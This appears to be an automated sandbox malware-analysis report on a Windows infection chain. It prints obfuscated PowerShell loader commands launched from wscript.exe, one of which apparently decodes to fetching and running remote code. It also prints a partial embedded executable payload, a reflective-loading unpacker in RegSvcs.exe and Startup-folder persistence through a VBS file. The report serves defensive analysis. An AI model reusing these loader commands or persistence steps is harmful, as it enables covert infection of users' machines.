?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? Q Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? Jump to behavior
.NET source code contains potential unpacker
Source: 22.0.RegSvcs.exe.400000.1.unpack, Program.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 22.0.RegSvcs.exe.400000.3.unpack, Program.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 22.0.RegSvcs.exe.400000.2.unpack, Program.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 22.2.RegSvcs.exe.400000.0.unpack, Program.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 22.0.RegSvcs.exe.400000.0.unpack, Program.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 22.0.RegSvcs.exe.400000.4.unpack, Program.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Obfuscated command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? Q
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? Q Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFC08385234 push eax; retn 0023h 16_2_00007FFC08385235
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_00007FFC08455F38 push edx; ret 24_2_00007FFC08455F3B

Boot Survival
barindex
Drops VBS files to the startup folder
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs Jump to dropped file
Stores files to the Windows start menu directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs\:Zone.Identifier:$DATA Jump to behavior
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
